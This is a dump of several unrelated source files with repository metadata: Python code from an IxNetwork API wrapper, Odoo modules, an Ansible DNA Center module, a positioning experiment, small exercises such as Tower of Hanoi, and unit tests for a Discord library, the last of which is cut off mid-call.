        By default the find method takes no parameters and will retrieve all netTopologyTree data from the server.

        Args:
            IncludeEntryPoint (bool): if true, entry node belongs to ring topology, otherwise it is outside of ring
            LinkMultiplier (number): number of links between two nodes
            MaxChildPerNode (number): Maximum children per node
            Nodes (number): number of nodes
            TreeDepth (number): Depth of the Tree, defined as length of path from root node to deepest node in the tree
            UseTreeDepth (bool): Use Tree Depth

        Returns:
            self: This instance with matching netTopologyTree data retrieved from the server available through an iterator or index

        Raises:
            ServerError: The server has encountered an uncategorized error condition
        """
        return self._select(locals())

    def read(self, href):
        """Retrieves a single instance of netTopologyTree data from the server.

        Args:
            href (str): An href to the instance to be retrieved

        Returns:
            self: This instance with the netTopologyTree data from the server available through an iterator or index

        Raises:
            NotFoundError: The requested resource does not exist on the server
            ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
|
[
"srvc_cm_packages@keysight.com"
] |
srvc_cm_packages@keysight.com
|
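A hypothetical usage sketch for the class above: `net_topology` is a placeholder for whatever parent instance exposes the `NetTopologyTree` property in a live ixnetwork_restpy session, and only the methods defined above are exercised:

```python
# Hypothetical sketch; 'net_topology' stands in for a real parent instance.
tree = net_topology.NetTopologyTree.add(Nodes=9, MaxChildPerNode=3, TreeDepth=2, UseTreeDepth=True)
tree.update(LinkMultiplier=2)                                    # push a changed attribute to the server
matches = net_topology.NetTopologyTree.find(UseTreeDepth=True)   # server-side filtered fetch
tree.remove()                                                    # delete the node on the server
```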
f9e738f5b5b8110966032a68c9aeae66c200a6bf
|
7c9919126b96122c1a8c6353769e209d850e4564
|
/bnk_hr_leave/models/hr_leave_allocation.py
|
bee706f6393dea1a328430f51d060ead0e48e84c
|
[] |
no_license
|
Duongnv-dev/hr
|
8ee34c904d481a4d0f4182c3c6bfd6c28ef25ffe
|
962e0edab5b824304f4a2b2dff23458135f94c3c
|
refs/heads/master
| 2023-06-19T06:54:00.337453
| 2021-07-13T01:53:34
| 2021-07-13T01:53:34
| 385,439,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 210
|
py
|
from odoo import fields, models, api


class HrLeaveAllocation(models.Model):
    _inherit = 'hr.leave.allocation'
    _description = 'Inherit leave allocation'

    contract_id = fields.Many2one('hr.contract')
|
[
"duong.nguyen@bnksolution.com"
] |
duong.nguyen@bnksolution.com
|
9184d820d21d39a76067d3a1353b4cc581849604
|
c52e7808ab764d822267b36a185223a172a56b5a
|
/tasks/1_area_of_triangle.py
|
815e4c3722c0eea544ca8f78c924b6611d678e2e
|
[] |
no_license
|
lohitbadiger/Python-teaching-all
|
c41bfa2c98bab1493aba5269ab81efa6be02c73f
|
b7ed285b6b2df9c23fa5bf0c91381729b9ac0c6f
|
refs/heads/master
| 2020-06-02T21:13:05.276475
| 2019-06-17T06:55:06
| 2019-06-17T06:55:06
| 191,311,539
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 314
|
py
|
# base = int(input("Enter the value for base: "))
# height = int(input('Enter the height: '))
# area = 0.5 * base * height
# print('area of the triangle is ', area)

# one more way
x, y = input('Enter the values for x and y: ').split()
print('value of x is ', x)
print('value of y is ', y)
result = 0.5 * int(x) * int(y)
print(result)
|
[
"lohit2013n@gmail.com"
] |
lohit2013n@gmail.com
|
3e243c5c508242ec4a50d667569a9822d6418118
|
e5dc27e634aba70bcd1b3acea74fed84ddccf837
|
/plugins/modules/network_device_update_role.py
|
be3fbcb35812197122cd5cd3a645eff6418c11d8
|
[] |
no_license
|
jejrichardson/dnacenter-ansible
|
264d1b52227d4bf78ad175494763cff9e7881f34
|
f10078ef8323bda4b542e71bcecf4f80a7fe0609
|
refs/heads/master
| 2023-01-28T09:54:57.449459
| 2020-12-09T23:15:49
| 2020-12-09T23:15:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,543
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-

# Copyright: (c) 2020, Rafael Campos <rcampos@altus.cr>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)

ANSIBLE_METADATA = {
    "metadata_version": "0.0.1",
    "status": ["preview"],
    "supported_by": "community",
}

DOCUMENTATION = r"""
---
module: network_device_update_role
short_description: Manage NetworkDeviceUpdateRole objects of Devices
description:
- Updates the role of the device as access, core, distribution, border router.
version_added: '1.0'
author: Rafael Campos (@racampos)
options:
  id:
    description:
    - NetworkDeviceBriefNIO's id.
    type: str
    required: True
  role:
    description:
    - NetworkDeviceBriefNIO's role.
    type: str
    required: True
  roleSource:
    description:
    - NetworkDeviceBriefNIO's roleSource.
    type: str
    required: True
  summary:
    description:
    - If true gets the summary.
    type: bool
    required: True
requirements:
- dnacentersdk
seealso:
# Reference by module name
- module: cisco.dnac.plugins.module_utils.definitions.network_device_update_role
# Reference by Internet resource
- name: NetworkDeviceUpdateRole reference
  description: Complete reference of the NetworkDeviceUpdateRole object model.
  link: https://developer.cisco.com/docs/dna-center/api/1-3-3-x
# Reference by Internet resource
- name: NetworkDeviceUpdateRole reference
  description: SDK reference.
  link: https://dnacentersdk.readthedocs.io/en/latest/api/api.html#v2-1-1-summary
"""

EXAMPLES = r"""
- name: update_device_role
  cisco.dnac.network_device_update_role:
    state: update  # required
    id: SomeValue  # string, required
    role: SomeValue  # string, required
    roleSource: SomeValue  # string, required
    summary: True  # boolean, required
"""

RETURN = """
update_device_role:
  description: Updates the role of the device as access, core, distribution, border router.
  returned: changed
  type: dict
  contains:
    response:
      description: NetworkDeviceBriefNIO's response.
      returned: changed
      type: dict
      contains:
        taskId:
          description: It is the network device update role's taskId.
          returned: changed
          type: dict
        url:
          description: It is the network device update role's url.
          returned: changed
          type: str
          sample: '<url>'
    version:
      description: NetworkDeviceBriefNIO's version.
      returned: changed
      type: str
      sample: '1.0'
"""
|
[
"rcampos@altus.cr"
] |
rcampos@altus.cr
|
bbaf9c29390c28dc9d8519047288393f4d9b4247
|
455a91b28590d0b7ee1519f6d1ee2d554db4298b
|
/exps/exp_22102015/positioning_covar_meta.py
|
2719fdaf70712a3ec6f905739e3e081ec62ac8f3
|
[] |
no_license
|
yairbeer/my_repository
|
a038201fb12b19cb249eb98c17478b0c086a9b04
|
a07660b9db412c11ae3fb6835e15481e60a687ff
|
refs/heads/master
| 2021-01-10T01:20:27.010430
| 2015-11-19T08:47:55
| 2015-11-19T08:47:55
| 46,478,844
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,758
|
py
|
import numpy as np
import exps.exp_22102015.config_exp as cfg_exp
import exps.fn_exp as fn_exp
import functions as fn
import exps.exp_22102015.track as track
import exps.exp_22102015.doa as doa
import itertools
import matplotlib.pyplot as plt

__author__ = 'YBeer'

"""
Calculating the probability density for each meta position, then finding the density maximum.
"""

estimate_pos = []
for i in range(len(track.track_list)):
    # single repeat
    ap_direction = np.repeat(track.aps[:, 2].reshape((1, track.aps.shape[0])), doa.ap_timed_kaplan[i].shape[0], axis=0)
    # Converting to predicted global angle
    global_angle = ap_direction + doa.ap_timed_kaplan[i]
    # Converting predicted angles into slopes
    slopes = 1 / np.tan(np.radians(global_angle))
    # Finding y intercept
    y_intercept = track.aps[:, 1] * np.ones(slopes.shape) - slopes * track.aps[:, 0]
    pos = np.ones((global_angle.shape[0], 2)) * np.nan
    covars = []
    for j in range(slopes.shape[0]):
        valid_aps = fn_exp.find_crossing(global_angle[j, :])
        if len(valid_aps) > 1:
            couples = list(itertools.combinations(valid_aps, 2))
            prelim_pos = []
            weights = []
            ellipse = []
            for crossing in couples:
                # Calculating cross-points
                prelim_pos.append(fn_exp.crossings(slopes[j, :], y_intercept[j, :], crossing))
                # Calculate distance between exp.aps and cross point
                dist0, dist1 = fn_exp.crossings_dist(track.aps, crossing, prelim_pos[-1])
                # Find angles from both exp.aps
                angle0 = global_angle[j, crossing[0]]
                angle1 = global_angle[j, crossing[1]]
                # Calculate SD covariance
                cur_eigen_val, cur_eigen_angles = fn_exp.sd_eigen(angle0, angle1, dist0, dist1)
                cur_covars = fn_exp.sd_covar(cur_eigen_val, cur_eigen_angles)
                covars.append(cur_covars)
                ellipse.append(fn_exp.create_ellipse(prelim_pos[-1], cur_eigen_val, cur_eigen_angles))
            pos[j] = fn_exp.estimate_xy_covar(prelim_pos, covars)
            # print prelim_pos, covars
            # if len(valid_aps) == 3:
            #     plt.plot(prelim_pos[0][0], prelim_pos[0][1], 'ro', ellipse[0][:, 0], ellipse[0][:, 1], 'r--',
            #              prelim_pos[1][0], prelim_pos[1][1], 'go', ellipse[1][:, 0], ellipse[1][:, 1], 'g--',
            #              prelim_pos[2][0], prelim_pos[2][1], 'bo', ellipse[2][:, 0], ellipse[2][:, 1], 'b--',
            #              pos[j][0], pos[j][1], 'ko',
            #              track.track[i][j, 0], track.track[i][j, 1], 'k^',)
            #     plt.title(str([cur_eigen_val, cur_eigen_angles[0], cur_covars]))
            #     plt.show()
    # Change NaN to last known position
    pos = fn.remove_nan(pos)
    # Remove points from outside
    # pos = fn.remove_outside(pos)
    estimate_pos.append(pos)

    # Holt's filtering algorithm (double exponential smoothing)
    holt = np.zeros(pos.shape)
    holt[0, :] = pos[0, :]
    holt_trend = np.zeros(pos.shape)
    for j in range(1, pos.shape[0]):
        holt[j, :] = (1 - cfg_exp.alpha) * (holt[j - 1, :] + holt_trend[j - 1, :]) + cfg_exp.alpha * pos[j, :]
        holt_trend[j, :] = cfg_exp.trend * (holt[j, :] - holt[j - 1, :]) + (1 - cfg_exp.trend) * holt_trend[j - 1, :]

# RMSE over the 1st track
RMSE = np.sqrt(np.sum((track.track[0][:, 0] - estimate_pos[0][:, 0]) ** 2 +
                      (track.track[0][:, 1] - estimate_pos[0][:, 1]) ** 2) / estimate_pos[0].shape[0])
print(RMSE)

# 1D plot
plt.figure(1)
plt.subplot(221)
plt.plot(track.track_time_int[0], track.track[0][:, 0], 'r', track.track_time_int[0], estimate_pos[0][:, 0], 'b')
plt.title('track 0 x(t) axis tracking')
plt.ylim((-5, 130))
plt.subplot(222)
plt.plot(track.track_time_int[0], track.track[0][:, 1], 'r', track.track_time_int[0], estimate_pos[0][:, 1], 'b')
plt.title('track 0 y(t) axis tracking')
plt.ylim((-5, 100))
plt.subplot(223)
plt.plot(track.track_time_int[1], track.track[1][:, 0], 'r', track.track_time_int[1], estimate_pos[1][:, 0], 'b')
plt.title('track 1 x(t) axis tracking')
plt.ylim((-5, 130))
plt.subplot(224)
plt.plot(track.track_time_int[1], track.track[1][:, 1], 'r', track.track_time_int[1], estimate_pos[1][:, 1], 'b')
plt.title('track 1 y(t) axis tracking')
plt.ylim((-5, 100))
plt.show()

# 2D plot
plt.figure(1)
plt.subplot(211)
plt.plot(track.track[0][:, 0], track.track[0][:, 1], 'r', estimate_pos[0][:, 0], estimate_pos[0][:, 1], 'b')
plt.title('track 0 pos tracking')
plt.subplot(212)
plt.plot(track.track[1][:, 0], track.track[1][:, 1], 'r', estimate_pos[1][:, 0], estimate_pos[1][:, 1], 'b')
plt.title('track 1 pos tracking')
plt.show()
|
[
"yaia1309@gmail.com"
] |
yaia1309@gmail.com
|
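The inner loop near the end is Holt's double exponential smoothing: a level and a trend term are blended with the constants `cfg_exp.alpha` and `cfg_exp.trend`. A standalone sketch of that update, with hypothetical constants in place of the config module:

```python
# Standalone sketch of the Holt update used above; alpha and trend are
# hypothetical stand-ins for cfg_exp.alpha / cfg_exp.trend.
import numpy as np

def holt_filter(pos, alpha=0.5, trend=0.3):
    level = np.zeros_like(pos)
    slope = np.zeros_like(pos)
    level[0] = pos[0]
    for j in range(1, len(pos)):
        level[j] = (1 - alpha) * (level[j - 1] + slope[j - 1]) + alpha * pos[j]
        slope[j] = trend * (level[j] - level[j - 1]) + (1 - trend) * slope[j - 1]
    return level
```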
49aa9867f2de64f94bc8bce9aee367e02d4c0ece
|
bbab25f702c7bb7ce6cd894d98a121e61967d48a
|
/controllers/controllers.py
|
11968a608c0f21d15bc486b283939dc4dc43cadd
|
[] |
no_license
|
butirpadi/bp_po_carton_box_report
|
9b83310ea010dbe848857cae74642e6993431d58
|
2f9bad119b1fe371bf4bc2d8ba09917c2134f86b
|
refs/heads/master
| 2023-08-30T03:49:11.564193
| 2021-11-01T09:23:11
| 2021-11-01T09:23:11
| 309,541,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
# -*- coding: utf-8 -*-
from odoo import http
# class BpPoCartonBoxReport(http.Controller):
# @http.route('/bp_po_carton_box_report/bp_po_carton_box_report/', auth='public')
# def index(self, **kw):
# return "Hello, world"
# @http.route('/bp_po_carton_box_report/bp_po_carton_box_report/objects/', auth='public')
# def list(self, **kw):
# return http.request.render('bp_po_carton_box_report.listing', {
# 'root': '/bp_po_carton_box_report/bp_po_carton_box_report',
# 'objects': http.request.env['bp_po_carton_box_report.bp_po_carton_box_report'].search([]),
# })
# @http.route('/bp_po_carton_box_report/bp_po_carton_box_report/objects/<model("bp_po_carton_box_report.bp_po_carton_box_report"):obj>/', auth='public')
# def object(self, obj, **kw):
# return http.request.render('bp_po_carton_box_report.object', {
# 'object': obj
# })
|
[
"butirpadi@gmail.com"
] |
butirpadi@gmail.com
|
fa3baa33bdde98c67faa2adaf19e614694f489e8
|
00a9128553902cb398dc99865d36e09159285b86
|
/python/p3.py
|
1f8b36777f8dc1b69701b73902672fc201d33c6f
|
[] |
no_license
|
horacepan/aoc2020
|
f498faa8c8bba4cabcfba6508a73074adb51d84c
|
f6d38f2b37245e89fb6f8eb4c55c74423626ca04
|
refs/heads/main
| 2023-02-06T03:16:21.530346
| 2020-12-20T21:33:53
| 2020-12-20T21:33:53
| 317,640,340
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 775
|
py
|
def solve(mat, dx, dy):
    rows = len(mat)
    cols = len(mat[0])
    loc_x = 0
    loc_y = 0
    ntrees = 0
    while 1:
        if loc_x < rows:
            ntrees += int(mat[loc_x][loc_y] == '#')
        else:
            break
        loc_x += dx
        loc_y = (loc_y + dy) % cols
    return ntrees


def main():
    fname = '../data/p3.txt'
    with open(fname, 'r') as f:
        mat = []
        for line in f.readlines():
            mat.append(line.strip())
    a1 = solve(mat, 1, 1)
    a2 = solve(mat, 1, 3)
    a3 = solve(mat, 1, 5)
    a4 = solve(mat, 1, 7)
    a5 = solve(mat, 2, 1)
    prod = a1 * a2 * a3 * a4 * a5
    print("Part one:", a2)  # part one asks only for the (right 3, down 1) slope
    print("Part two:", prod)


if __name__ == '__main__':
    main()
|
[
"hopan@uchicago.edu"
] |
hopan@uchicago.edu
|
c40632c9ff9da232e070e4cdd547dfd5cc32f0d4
|
31e1261588e953d4e702a76e1c5306a8a97cff04
|
/monk/gluon/datasets/paths.py
|
c4656a51daa42e9c5cca5e8dd8767763c42c03c2
|
[
"Apache-2.0"
] |
permissive
|
Varun0801/monk_v1
|
cff6e8390a9248208ba825eb0046119f4f284ab1
|
559ff37669d88fd2cfaaf9d22ad84cd6cef9d176
|
refs/heads/master
| 2022-04-17T05:19:53.372524
| 2020-04-11T13:11:35
| 2020-04-11T13:11:35
| 255,113,878
| 1
| 0
| null | 2020-04-12T15:35:25
| 2020-04-12T15:35:24
| null |
UTF-8
|
Python
| false
| false
| 4,546
|
py
|
from gluon.datasets.imports import *
from system.imports import *


@accepts(dict, [str, list, bool], [float, int, bool], [str, list, bool], str, post_trace=True)
@TraceFunction(trace_args=False, trace_rv=False)
def set_dataset_train_path(system_dict, path, split, path_to_csv, delimiter):
    '''
    Set dataset train path

    Args:
        system_dict (dict): System dictionary containing all the variables
        path (str, list): Dataset folder path
                            1) String: For dataset with no validation set
                            2) List: For dataset with validation set in order [train_set, val_set]
        split (float): Indicating train validation split
                        Division happens as follows:
                            train - total dataset * split * 100
                            val - total dataset * (1-split) * 100
        path_to_csv (str, list): Path to csv pointing to images
        delimiter (str): Delimiter for the csv path provided

    Returns:
        dict: Updated System dictionary
    '''
    dataset_type = None;
    dataset_train_path = None;
    dataset_val_path = None;
    csv_train = None;
    csv_val = None;
    train_val_split = None;

    if(path_to_csv):
        if(type(path) == str):
            dataset_type = "csv_train";
            csv_train = path_to_csv;
            dataset_train_path = path;
            train_val_split = split;
            label_type = find_label_type(path_to_csv)
        elif(type(path) == list):
            dataset_type = "csv_train-val";
            csv_train = path_to_csv[0];
            csv_val = path_to_csv[1];
            dataset_train_path = path[0];
            dataset_val_path = path[1];
            train_val_split = None;
            label_type = find_label_type(path_to_csv[0])
    else:
        if(type(path) == str):
            dataset_type = "train";
            dataset_train_path = path;
            train_val_split = split;
            label_type = "single";
        elif(type(path) == list):
            dataset_type = "train-val";
            dataset_train_path = path[0];
            dataset_val_path = path[1];
            train_val_split = None;
            label_type = "single";

    system_dict["dataset"]["dataset_type"] = dataset_type;
    system_dict["dataset"]["train_path"] = dataset_train_path;
    system_dict["dataset"]["val_path"] = dataset_val_path;
    system_dict["dataset"]["csv_train"] = csv_train;
    system_dict["dataset"]["csv_val"] = csv_val;
    system_dict["dataset"]["params"]["train_val_split"] = train_val_split;
    system_dict["dataset"]["params"]["delimiter"] = delimiter;
    system_dict["dataset"]["label_type"] = label_type;

    return system_dict;


@accepts(str, post_trace=True)
@TraceFunction(trace_args=True, trace_rv=True)
def find_label_type(csv_file):
    '''
    Find label type - single or multiple

    Args:
        csv_file (str): Path to training csv file

    Returns:
        str: Label Type
    '''
    label_type = "single";
    df = pd.read_csv(csv_file);
    columns = df.columns;
    for i in range(len(df)):
        label = str(df[columns[1]][i]);
        if(len(label.split(" ")) > 1):
            label_type = "multiple";
            break;
    return label_type;


@accepts(dict, [str, bool], [str, bool], str, post_trace=True)
@TraceFunction(trace_args=False, trace_rv=False)
def set_dataset_test_path(system_dict, path, path_to_csv, delimiter):
    '''
    Set dataset test path

    Args:
        system_dict (dict): System dictionary containing all the variables
        path (str): Dataset folder path
        path_to_csv (str): Path to csv pointing to images
        delimiter (str): Delimiter for the csv path provided

    Returns:
        dict: Updated System dictionary
    '''
    dataset_test_type = None;
    dataset_test_path = None;
    csv_test = None;

    if(path_to_csv):
        csv_test = path_to_csv;
        dataset_test_path = path;
        dataset_test_type = "csv";
    else:
        dataset_test_path = path;
        dataset_test_type = "foldered";

    system_dict["dataset"]["test_path"] = dataset_test_path;
    system_dict["dataset"]["csv_test"] = csv_test;
    system_dict["dataset"]["params"]["test_delimiter"] = delimiter;
    system_dict["dataset"]["params"]["dataset_test_type"] = dataset_test_type;

    return system_dict;
|
[
"abhishek4273@gmail.com"
] |
abhishek4273@gmail.com
|
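An illustrative call sequence for the helpers above, assuming a minimal `system_dict` that already has the nested `dataset`/`params` keys they write into (paths are placeholders):

```python
# Illustration only: minimal dict shape these helpers expect to exist.
system_dict = {"dataset": {"params": {}}}

# Foldered train set with an 80/20 train/val split (no csv).
system_dict = set_dataset_train_path(system_dict, "datasets/train", 0.8, False, ",")
# -> dataset_type "train", train_val_split 0.8, label_type "single"

# Foldered test set.
system_dict = set_dataset_test_path(system_dict, "datasets/test", False, ",")
# -> dataset_test_type "foldered"
```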
3a9bd176b6447bea26b249ad12815762e165a913
|
c80314871502377180b1d496d0d4e7dc9e8cdba8
|
/exercise/python_1040_practice_algo_recursion_hanoi.py
|
abbc470f6e534414af43740e26a3719053d2293e
|
[] |
no_license
|
tomboxfan/PythonExample
|
996896bcbc0bf83fbca7d28bcb207dca35875f6b
|
8b071314b4dc4c3e3acccb835405c44630a15722
|
refs/heads/master
| 2023-02-11T13:55:26.591124
| 2021-01-09T03:20:46
| 2021-01-09T03:20:46
| 275,275,138
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,672
|
py
|
'''
Requirement:
The Tower of Hanoi puzzle was invented by the French mathematician Edouard Lucas in 1883.
He was inspired by a legend that tells of a Hindu temple where the puzzle was presented to young priests.
At the beginning of time, the priests were given three poles and a stack of 64 gold disks,
each disk a little smaller than the one beneath it.
Their assignment was to transfer all 64 disks from one of the three poles to another, with two important constraints.
1) They could only move one disk at a time.
2) They could never place a larger disk on top of a smaller one.
The priests worked very efficiently, day and night, moving one disk every second.
When they finished their work, the legend said, the temple would crumble into dust and the world would vanish.
Although the legend is interesting, you need not worry about the world ending any time soon.
The number of moves required to correctly move a tower of 64 disks is 2^64−1=18,446,744,073,709,551,615.
At a rate of one move per second, that is 584,942,417,355 years! Clearly there is more to this puzzle than meets the eye.
'''
def tower_of_hanoi(n, from_rod, to_rod, help_rod):
    if n == 1:
        print(f"Move disk {n} from {from_rod} to {to_rod}")
    else:
        # Step 1) Move n-1 disks from 'from_rod' to 'help_rod', via 'to_rod'.
        tower_of_hanoi(n - 1, from_rod, help_rod, to_rod)
        # Step 2) Move disk n from 'from_rod' to 'to_rod'.
        print(f"Move disk {n} from {from_rod} to {to_rod}")
        # Step 3) Move n-1 disks from 'help_rod' to 'to_rod', via 'from_rod'.
        tower_of_hanoi(n - 1, help_rod, to_rod, from_rod)


tower_of_hanoi(4, 'A', 'C', 'B')
|
[
"tomboxfan@hotmail.com"
] |
tomboxfan@hotmail.com
|
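The docstring's 2^64 − 1 move count follows from the recurrence moves(n) = 2·moves(n−1) + 1, which closes to 2^n − 1, and the 584-billion-year figure is just that count in seconds:

```python
def moves(n):
    # moves(n) = 2 * moves(n - 1) + 1, with moves(1) = 1, i.e. 2**n - 1
    return 1 if n == 1 else 2 * moves(n - 1) + 1

assert moves(4) == 2 ** 4 - 1 == 15
seconds = 2 ** 64 - 1                     # 18,446,744,073,709,551,615 moves at one per second
print(seconds / (60 * 60 * 24 * 365.25))  # ~5.85e11 years, matching the legend's timescale
```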
e6f61f08c4027bfec92381e04e2087c07efa6800
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03592/s369623086.py
|
0473e1e86b92c11c4dd5abc861aa31996a132b45
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 926
|
py
|
import sys, re
from collections import deque, defaultdict, Counter
from math import ceil, sqrt, hypot, factorial, pi, sin, cos, radians
from itertools import accumulate, permutations, combinations, product, groupby
from operator import itemgetter, mul
from copy import deepcopy
from string import ascii_lowercase, ascii_uppercase, digits
from bisect import bisect, bisect_left
from fractions import gcd
from heapq import heappush, heappop
from functools import reduce
def input(): return sys.stdin.readline().strip()
def INT(): return int(input())
def MAP(): return map(int, input().split())
def LIST(): return list(map(int, input().split()))
def ZIP(n): return zip(*(MAP() for _ in range(n)))
sys.setrecursionlimit(10 ** 9)
INF = float('inf')
mod = 10 ** 9 + 7
H, W, K = MAP()

for x in range(H + 1):
    y = (K - x * W) / (H - 2 * x) if H != 2 * x else (H * W - K) / H
    if y.is_integer() and 0 <= y <= W:
        print("Yes")
        break
else:
    print("No")
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
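The closed form in the loop is consistent with flipping `x` whole rows and `y` whole columns, where a cell changes state unless both its row and column were flipped: flipped count = x·W + y·H − 2·x·y, so y = (K − x·W)/(H − 2x) when H ≠ 2x. A brute-force cross-check of that identity, assuming that is indeed the quantity being solved for:

```python
# Hedged sketch: exhaustively try every (x, y) pair and test
# x*W + y*H - 2*x*y == K, the identity the solution above inverts.
def brute(H, W, K):
    return any(x * W + y * H - 2 * x * y == K
               for x in range(H + 1) for y in range(W + 1))

print("Yes" if brute(3, 5, 8) else "No")  # x=1 row, y=3 columns -> 5 + 9 - 6 = 8
```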
5b17863999522ec2777bdd7083007c20f69cbd08
|
df7f13ec34591fe1ce2d9aeebd5fd183e012711a
|
/hata/discord/channel/channel_metadata/tests/test__ChannelMetadataGuildThreadAnnouncements__utility.py
|
79cd654d880a07831297665da13916f7b7c4630c
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
HuyaneMatsu/hata
|
63e2f6a2d7a7539fd8f18498852d9d3fe5c41d2e
|
53f24fdb38459dc5a4fd04f11bdbfee8295b76a4
|
refs/heads/master
| 2023-08-20T15:58:09.343044
| 2023-08-20T13:09:03
| 2023-08-20T13:09:03
| 163,677,173
| 3
| 3
|
Apache-2.0
| 2019-12-18T03:46:12
| 2018-12-31T14:59:47
|
Python
|
UTF-8
|
Python
| false
| false
| 7,445
|
py
|
from datetime import datetime as DateTime

import vampytest

from ..guild_thread_base import ChannelMetadataGuildThreadBase

from .test__ChannelMetadataGuildThreadBase__constructor import _assert_fields_set


def test__ChannelMetadataGuildThreadBase__copy():
    """
    Tests whether ``ChannelMetadataGuildThreadBase.copy`` works as intended.
    """
    name = 'alice'
    parent_id = 202304120047
    created_at = DateTime(2016, 4, 4)
    archived = False
    archived_at = DateTime(2017, 4, 4)
    auto_archive_after = 3600
    open_ = True
    owner_id = 202304120048
    slowmode = 30

    channel_metadata = ChannelMetadataGuildThreadBase(
        name = name,
        parent_id = parent_id,
        created_at = created_at,
        archived = archived,
        archived_at = archived_at,
        auto_archive_after = auto_archive_after,
        open = open_,
        owner_id = owner_id,
        slowmode = slowmode,
    )

    copy = channel_metadata.copy()
    _assert_fields_set(copy)
    vampytest.assert_is_not(copy, channel_metadata)

    vampytest.assert_eq(copy, channel_metadata)


def test__ChannelMetadataGuildThreadBase__copy_with__0():
    """
    Tests whether ``ChannelMetadataGuildThreadBase.copy_with`` works as intended.

    Case: No fields.
    """
    name = 'alice'
    parent_id = 202304120049
    created_at = DateTime(2016, 4, 4)
    archived = False
    archived_at = DateTime(2017, 4, 4)
    auto_archive_after = 3600
    open_ = True
    owner_id = 202304120050
    slowmode = 30

    channel_metadata = ChannelMetadataGuildThreadBase(
        name = name,
        parent_id = parent_id,
        created_at = created_at,
        archived = archived,
        archived_at = archived_at,
        auto_archive_after = auto_archive_after,
        open = open_,
        owner_id = owner_id,
        slowmode = slowmode,
    )

    copy = channel_metadata.copy_with()
    _assert_fields_set(copy)
    vampytest.assert_is_not(copy, channel_metadata)

    vampytest.assert_eq(copy, channel_metadata)


def test__ChannelMetadataGuildThreadBase__copy_with__1():
    """
    Tests whether ``ChannelMetadataGuildThreadBase.copy_with`` works as intended.

    Case: All fields.
    """
    old_name = 'alice'
    old_parent_id = 202304120051
    old_created_at = DateTime(2016, 4, 4)
    old_archived = False
    old_archived_at = DateTime(2017, 4, 4)
    old_auto_archive_after = 3600
    old_open = True
    old_owner_id = 202304120052
    old_slowmode = 30

    new_name = 'emotion'
    new_parent_id = 202304120053
    new_created_at = DateTime(2016, 4, 5)
    new_archived = True
    new_archived_at = DateTime(2017, 4, 5)
    new_auto_archive_after = 604800
    new_open = False
    new_owner_id = 202304120054
    new_slowmode = 31

    channel_metadata = ChannelMetadataGuildThreadBase(
        name = old_name,
        parent_id = old_parent_id,
        created_at = old_created_at,
        archived = old_archived,
        archived_at = old_archived_at,
        auto_archive_after = old_auto_archive_after,
        open = old_open,
        owner_id = old_owner_id,
        slowmode = old_slowmode,
    )

    copy = channel_metadata.copy_with(
        name = new_name,
        parent_id = new_parent_id,
        created_at = new_created_at,
        archived = new_archived,
        archived_at = new_archived_at,
        auto_archive_after = new_auto_archive_after,
        open = new_open,
        owner_id = new_owner_id,
        slowmode = new_slowmode,
    )

    _assert_fields_set(copy)
    vampytest.assert_is_not(copy, channel_metadata)

    vampytest.assert_eq(copy.name, new_name)
    vampytest.assert_eq(copy.parent_id, new_parent_id)
    vampytest.assert_eq(copy._created_at, new_created_at)
    vampytest.assert_eq(copy.archived, new_archived)
    vampytest.assert_eq(copy.archived_at, new_archived_at)
    vampytest.assert_eq(copy.auto_archive_after, new_auto_archive_after)
    vampytest.assert_eq(copy.open, new_open)
    vampytest.assert_eq(copy.owner_id, new_owner_id)
    vampytest.assert_eq(copy.slowmode, new_slowmode)


def test__ChannelMetadataGuildThreadBase__copy_with_keyword_parameters__0():
    """
    Tests whether ``ChannelMetadataGuildThreadBase.copy_with_keyword_parameters`` works as intended.

    Case: No fields.
    """
    name = 'alice'
    parent_id = 202304120055
    created_at = DateTime(2016, 4, 4)
    archived = False
    archived_at = DateTime(2017, 4, 4)
    auto_archive_after = 3600
    open_ = True
    owner_id = 202304120056
    slowmode = 30

    channel_metadata = ChannelMetadataGuildThreadBase(
        name = name,
        parent_id = parent_id,
        created_at = created_at,
        archived = archived,
        archived_at = archived_at,
        auto_archive_after = auto_archive_after,
        open = open_,
        owner_id = owner_id,
        slowmode = slowmode,
    )

    keyword_parameters = {}
    copy = channel_metadata.copy_with_keyword_parameters(keyword_parameters)
    _assert_fields_set(copy)
    vampytest.assert_is_not(copy, channel_metadata)
    vampytest.assert_eq(keyword_parameters, {})

    vampytest.assert_eq(copy, channel_metadata)


def test__ChannelMetadataGuildThreadBase__copy_with_keyword_parameters__1():
    """
    Tests whether ``ChannelMetadataGuildThreadBase.copy_with_keyword_parameters`` works as intended.

    Case: All fields.
    """
    old_name = 'alice'
    old_parent_id = 202304120057
    old_created_at = DateTime(2016, 4, 4)
    old_archived = False
    old_archived_at = DateTime(2017, 4, 4)
    old_auto_archive_after = 3600
    old_open = True
    old_owner_id = 202304120058
    old_slowmode = 30

    new_name = 'emotion'
    new_parent_id = 202304120059
    new_created_at = DateTime(2016, 4, 5)
    new_archived = True
    new_archived_at = DateTime(2017, 4, 5)
    new_auto_archive_after = 604800
    new_open = False
    new_owner_id = 202304120060
    new_slowmode = 31

    channel_metadata = ChannelMetadataGuildThreadBase(
        name = old_name,
        parent_id = old_parent_id,
        created_at = old_created_at,
        archived = old_archived,
        archived_at = old_archived_at,
